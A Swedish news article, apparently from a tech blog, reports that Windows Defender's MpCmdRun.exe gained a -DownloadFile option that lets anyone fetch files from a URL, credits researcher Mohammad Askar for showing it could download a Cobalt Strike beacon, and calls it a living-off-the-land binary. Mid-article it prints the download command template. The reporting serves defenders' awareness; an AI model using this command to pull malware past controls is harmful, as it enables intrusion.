Friendoffriends
Windows Defender i Windows 10 är den första försvarslinjen vid attacker av skadlig kod och det gör ett ganska bra jobb också.
Men i en av de nya uppdateringarna fick det mäktiga antivirusprogrammet ett nytt DownloadFile-kommando som gör det möjligt för alla att ladda ner alla filer från en URL till en viss sökväg på din dator.
Vi kan kalla detta ett utnyttjande eftersom det också kan användas för att till och med ladda ner skadlig kod, något som upptäcktes av säkerhetsforskaren Mohammad Askar som publicerade sitt resultat på Twitter.
Hur kan Windows Defender användas för att ladda ner skadlig kod?
Det är riktigt enkelt att använda Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) för att ladda ner alla filer från en extern källa till din dator.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
I sitt försök kunde Askar ladda ner Cobalt Strike-fyren, ett välkänt angriparverktyg som använder den här kommandoraden.
Det nya kommandot ingår i version 4.18.2007.8-0 och uppåt vilket ger en ganska bra starttid för angripare.
I grund och botten förvandlar den här funktionen Windows Defender till en LOLBIN (lever av binärfiler), en ofarlig systemfil som kan användas för skadliga ändamål.
Lyckligtvis, efter att du laddat ner den skadliga filen, kommer den att upptäckas av samma Windows Defender eller av ett annat antivirusprogram om det finns.
Från ett pålitligt skyddsprogram förvandlades Windows Defender till ett annat möjligt hot som måste övervakas noggrant av administratörer och säkerhetsexperter.
Om du har några förslag eller kommentarer, vänligen lämna dem nedan i avsnittet Kommentarer.
